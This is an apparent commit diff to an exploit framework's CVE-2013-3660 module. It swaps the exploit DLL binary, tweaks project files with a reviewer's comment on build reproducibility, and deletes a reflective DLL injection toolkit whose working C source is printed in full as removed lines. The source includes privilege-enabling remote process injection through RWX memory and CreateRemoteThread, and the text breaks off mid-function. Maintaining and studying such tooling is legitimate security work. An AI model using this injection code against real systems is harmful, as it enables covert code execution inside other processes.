diff --git a/data/exploits/cve-2013-3660/exploit.dll b/data/exploits/cve-2013-3660/exploit.dll
index 8b7ae21348..706e1e1d24 100755
Binary files a/data/exploits/cve-2013-3660/exploit.dll and b/data/exploits/cve-2013-3660/exploit.dll differ
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
index d01f1db543..1aae9cb3e1 100755
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
+++ b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
@@ -107,6 +107,7 @@
$(SolutionDir)$(Configuration)\$(Configuration)\false
+ exploitfalse
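Review bot: The added property line (rendered here with its XML tags stripped, so the element names are inferred) appears to set the output name to `exploit`, matching `data/exploits/cve-2013-3660/exploit.dll`, which this same commit replaces as an opaque binary. Nothing visible in this hunk ties the build output to that checked-in path or records which configuration and toolset produced it, so a reviewer cannot confirm that the committed DLL was built from this source. I would add a comment beside the new line, `<!-- Output must match data/exploits/cve-2013-3660/exploit.dll; rebuild and re-commit that file whenever dll/src changes -->`, and record the build configuration and a hash of the resulting DLL in the commit description. The enclosing property group starts and ends outside the hunk.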
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
index c8912a9e9d..29a70cc393 100755
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
+++ b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
@@ -431,11 +431,6 @@ typedef __success(return >= 0) LONG NTSTATUS;
typedef NTSTATUS *PNTSTATUS;
#endif
-#ifndef PAGE_SIZE
-# define PAGE_SIZE 0x1000
-#endif
-
-
// Search the specified data structure for a member with CurrentValue.
BOOL FindAndReplaceMember(PDWORD Structure,
DWORD CurrentValue,
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.sln b/external/source/exploits/cve-2013-3660/inject/inject.sln
deleted file mode 100755
index e6c711e846..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.sln
+++ /dev/null
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject.vcproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Release|Win32 = Release|Win32
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcproj b/external/source/exploits/cve-2013-3660/inject/inject.vcproj
deleted file mode 100755
index 87312eb71c..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.vcproj
+++ /dev/null
@@ -1,360 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj b/external/source/exploits/cve-2013-3660/inject/inject.vcxproj
deleted file mode 100755
index 683ccc4aa7..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj
+++ /dev/null
@@ -1,258 +0,0 @@
-
-
-
-
- Debug
- ARM
-
-
- Debug
- Win32
-
-
- Debug
- x64
-
-
- Release
- ARM
-
-
- Release
- Win32
-
-
- Release
- x64
-
-
-
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}
- inject
- Win32Proj
-
-
-
- Application
- v110
- MultiByte
- true
-
-
- Application
- v110
- MultiByte
- true
-
-
- Application
- v110
- Unicode
-
-
- Application
- v110
- Unicode
-
-
- Application
- v110
- MultiByte
- true
-
-
- Application
- v110
- Unicode
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- <_ProjectFileVersion>11.0.50727.1
-
-
- $(SolutionDir)$(Configuration)\
- $(Configuration)\
- true
-
-
- true
-
-
- $(SolutionDir)$(Platform)\$(Configuration)\
- $(Platform)\$(Configuration)\
- true
-
-
- $(SolutionDir)$(Configuration)\
- $(Configuration)\
- false
-
-
- false
-
-
- $(SolutionDir)$(Platform)\$(Configuration)\
- $(Platform)\$(Configuration)\
- false
-
-
-
- Disabled
- WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
- Level3
- EditAndContinue
-
-
- true
- Console
- MachineX86
-
-
-
-
- Disabled
- WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
-
- Level3
- EditAndContinue
-
-
- true
- Console
-
-
-
-
- X64
-
-
- Disabled
- WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
- Level3
- ProgramDatabase
-
-
- true
- Console
- MachineX64
-
-
-
-
- MaxSpeed
- true
- WIN32;NDEBUG;_CONSOLE;WIN_X86;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
- Level3
- ProgramDatabase
-
-
- true
- Console
- true
- true
- MachineX86
-
-
- copy ..\Release\inject.exe ..\bin\
-
-
-
-
- MaxSpeed
- true
- WIN32;NDEBUG;_CONSOLE;WIN_ARM;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
-
- Level3
- ProgramDatabase
-
-
- true
- Console
- true
- true
- $(OutDir)inject.arm.exe
- %(AdditionalDependencies)
-
-
- copy ..\ARM\Release\inject.arm.exe ..\bin\
-
-
-
-
- X64
-
-
- MaxSpeed
- true
- WIN64;NDEBUG;_CONSOLE;_WIN64;WIN_X64;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
- Level3
- ProgramDatabase
-
-
- $(OutDir)inject.x64.exe
- true
- Console
- true
- true
- MachineX64
-
-
- copy ..\x64\Release\inject.x64.exe ..\bin\
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters b/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters
deleted file mode 100755
index 418896d025..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters
+++ /dev/null
@@ -1,35 +0,0 @@
-
-
-
-
- {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
- cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
-
-
- {93995380-89BD-4b04-88EB-625FBE52EBFB}
- h;hpp;hxx;hm;inl;inc;xsd
-
-
-
-
- Source Files
-
-
- Source Files
-
-
- Source Files
-
-
-
-
- Header Files
-
-
- Header Files
-
-
- Header Files
-
-
-
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c b/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c
deleted file mode 100755
index ef96dcbfbe..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c
+++ /dev/null
@@ -1,116 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "GetProcAddressR.h"
-//===============================================================================================//
-// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
-// wont be able to resolve exported addresses in reflectivly loaded librarys.
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
-{
- UINT_PTR uiLibraryAddress = 0;
- FARPROC fpResult = NULL;
-
- if( hModule == NULL )
- return NULL;
-
- // a module handle is really its base address
- uiLibraryAddress = (UINT_PTR)hModule;
-
- __try
- {
- UINT_PTR uiAddressArray = 0;
- UINT_PTR uiNameArray = 0;
- UINT_PTR uiNameOrdinals = 0;
- PIMAGE_NT_HEADERS pNtHeaders = NULL;
- PIMAGE_DATA_DIRECTORY pDataDirectory = NULL;
- PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
-
- // get the VA of the modules NT Header
- pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
-
- pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the VA of the export directory
- pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
-
- // get the VA for the array of addresses
- uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
-
- // get the VA for the array of name pointers
- uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
-
- // get the VA for the array of name ordinals
- uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
-
- // test if we are importing by name or by ordinal...
- if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
- {
- // import by ordinal...
-
- // use the import ordinal (- export ordinal base) as an index into the array of addresses
- uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
-
- // resolve the address for this imported function
- fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
- }
- else
- {
- // import by name...
- DWORD dwCounter = pExportDirectory->NumberOfNames;
- while( dwCounter-- )
- {
- char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
-
- // test if we have a match...
- if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
- {
- // use the functions name ordinal as an index into the array of name pointers
- uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
- // calculate the virtual address for the function
- fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
-
- // finish...
- break;
- }
-
- // get the next exported function name
- uiNameArray += sizeof(DWORD);
-
- // get the next exported function name ordinal
- uiNameOrdinals += sizeof(WORD);
- }
- }
- }
- __except( EXCEPTION_EXECUTE_HANDLER )
- {
- fpResult = NULL;
- }
-
- return fpResult;
-}
-//===============================================================================================//
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h b/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h
deleted file mode 100755
index 4f5170c31d..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h
+++ /dev/null
@@ -1,36 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
-#define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/Inject.c b/external/source/exploits/cve-2013-3660/inject/src/Inject.c
deleted file mode 100755
index a7f4a2fee3..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/Inject.c
+++ /dev/null
@@ -1,120 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-#include
-#include
-#include "LoadLibraryR.h"
-
-#pragma comment(lib,"Advapi32.lib")
-
-#define BREAK_WITH_ERROR( e ) { printf( "[-] %s. Error=%d", e, GetLastError() ); break; }
-
-// Simple app to inject a reflective DLL into a process vis its process ID.
-int main( int argc, char * argv[] )
-{
- HANDLE hFile = NULL;
- HANDLE hModule = NULL;
- HANDLE hProcess = NULL;
- HANDLE hToken = NULL;
- LPVOID lpBuffer = NULL;
- DWORD dwLength = 0;
- DWORD dwBytesRead = 0;
- DWORD dwProcessId = 0;
- TOKEN_PRIVILEGES priv = {0};
-
-#ifdef WIN_X64
- char * cpDllFile = "reflective_dll.x64.dll";
-#else
-#ifdef WIN_X86
- char * cpDllFile = "reflective_dll.dll";
-#else WIN_ARM
- char * cpDllFile = "reflective_dll.arm.dll";
-#endif
-#endif
-
- do
- {
- // Usage: inject.exe [pid] [dll_file]
-
- if( argc == 1 )
- dwProcessId = GetCurrentProcessId();
- else
- dwProcessId = atoi( argv[1] );
-
- if( argc >= 3 )
- cpDllFile = argv[2];
-
- hFile = CreateFileA( cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
- if( hFile == INVALID_HANDLE_VALUE )
- BREAK_WITH_ERROR( "Failed to open the DLL file" );
-
- dwLength = GetFileSize( hFile, NULL );
- if( dwLength == INVALID_FILE_SIZE || dwLength == 0 )
- BREAK_WITH_ERROR( "Failed to get the DLL file size" );
-
- lpBuffer = HeapAlloc( GetProcessHeap(), 0, dwLength );
- if( !lpBuffer )
- BREAK_WITH_ERROR( "Failed to get the DLL file size" );
-
- if( ReadFile( hFile, lpBuffer, dwLength, &dwBytesRead, NULL ) == FALSE )
- BREAK_WITH_ERROR( "Failed to alloc a buffer!" );
-
- if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
- {
- priv.PrivilegeCount = 1;
- priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
-
- if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
- AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL );
-
- CloseHandle( hToken );
- }
-
- hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId );
- if( !hProcess )
- BREAK_WITH_ERROR( "Failed to open the target process" );
-
- hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, NULL );
- if( !hModule )
- BREAK_WITH_ERROR( "Failed to inject the DLL" );
-
- printf( "[+] Injected the '%s' DLL into process %d.", cpDllFile, dwProcessId );
-
- WaitForSingleObject( hModule, -1 );
-
- } while( 0 );
-
- if( lpBuffer )
- HeapFree( GetProcessHeap(), 0, lpBuffer );
-
- if( hProcess )
- CloseHandle( hProcess );
-
- return 0;
-}
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c b/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c
deleted file mode 100755
index db73903ff7..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c
+++ /dev/null
@@ -1,234 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "LoadLibraryR.h"
-#include
-//===============================================================================================//
-DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
-{
- WORD wIndex = 0;
- PIMAGE_SECTION_HEADER pSectionHeader = NULL;
- PIMAGE_NT_HEADERS pNtHeaders = NULL;
-
- pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
-
- pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
-
- if( dwRva < pSectionHeader[0].PointerToRawData )
- return dwRva;
-
- for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
- {
- if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
- return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
- }
-
- return 0;
-}
-//===============================================================================================//
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
-{
- UINT_PTR uiBaseAddress = 0;
- UINT_PTR uiExportDir = 0;
- UINT_PTR uiNameArray = 0;
- UINT_PTR uiAddressArray = 0;
- UINT_PTR uiNameOrdinals = 0;
- DWORD dwCounter = 0;
-#ifdef WIN_X64
- DWORD dwCompiledArch = 2;
-#else
- // This will catch Win32 and WinRT.
- DWORD dwCompiledArch = 1;
-#endif
-
- uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
-
- // get the File Offset of the modules NT Header
- uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
- // currenlty we can only process a PE file which is the same type as the one this fuction has
- // been compiled as, due to various offset in the PE structures being defined at compile time.
- if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
- {
- if( dwCompiledArch != 1 )
- return 0;
- }
- else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
- {
- if( dwCompiledArch != 2 )
- return 0;
- }
- else
- {
- return 0;
- }
-
- // uiNameArray = the address of the modules export directory entry
- uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the File Offset of the export directory
- uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
-
- // get the File Offset for the array of name pointers
- uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
-
- // get the File Offset for the array of addresses
- uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
-
- // get the File Offset for the array of name ordinals
- uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
-
- // get a counter for the number of exported functions...
- dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
-
- // loop through all the exported functions to find the ReflectiveLoader
- while( dwCounter-- )
- {
- char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
-
- if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
- {
- // get the File Offset for the array of addresses
- uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
-
- // use the functions name ordinal as an index into the array of name pointers
- uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
- // return the File Offset to the ReflectiveLoader() functions code...
- return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
- }
- // get the next exported function name
- uiNameArray += sizeof(DWORD);
-
- // get the next exported function name ordinal
- uiNameOrdinals += sizeof(WORD);
- }
-
- return 0;
-}
-//===============================================================================================//
-// Loads a DLL image from memory via its exported ReflectiveLoader function
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
-{
- HMODULE hResult = NULL;
- DWORD dwReflectiveLoaderOffset = 0;
- DWORD dwOldProtect1 = 0;
- DWORD dwOldProtect2 = 0;
- REFLECTIVELOADER pReflectiveLoader = NULL;
- DLLMAIN pDllMain = NULL;
-
- if( lpBuffer == NULL || dwLength == 0 )
- return NULL;
-
- __try
- {
- // check if the library has a ReflectiveLoader...
- dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
- if( dwReflectiveLoaderOffset != 0 )
- {
- pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
-
- // we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
- // this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
- if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
- {
- // call the librarys ReflectiveLoader...
- pDllMain = (DLLMAIN)pReflectiveLoader();
- if( pDllMain != NULL )
- {
- // call the loaded librarys DllMain to get its HMODULE
- if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )
- hResult = NULL;
- }
- // revert to the previous protection flags...
- VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
- }
- }
- }
- __except( EXCEPTION_EXECUTE_HANDLER )
- {
- hResult = NULL;
- }
-
- return hResult;
-}
-//===============================================================================================//
-// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
-// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-// defined in order to use the correct RDI prototypes.
-// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
-// PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
-// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
-// Note: This function currently cant inject accross architectures, but only to architectures which are the
-// same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
-{
- BOOL bSuccess = FALSE;
- LPVOID lpRemoteLibraryBuffer = NULL;
- LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
- HANDLE hThread = NULL;
- DWORD dwReflectiveLoaderOffset = 0;
- DWORD dwThreadId = 0;
-
- __try
- {
- do
- {
- if( !hProcess || !lpBuffer || !dwLength )
- break;
-
- // check if the library has a ReflectiveLoader...
- dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
- if( !dwReflectiveLoaderOffset )
- break;
-
- // alloc memory (RWX) in the host process for the image...
- lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
- if( !lpRemoteLibraryBuffer )
- break;
-
- // write the image into the host process...
- if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
- break;
-
- // add the offset to ReflectiveLoader() to the remote library address...
- lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
-
- // create a remote thread in the host process to call the ReflectiveLoader!
- hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
-
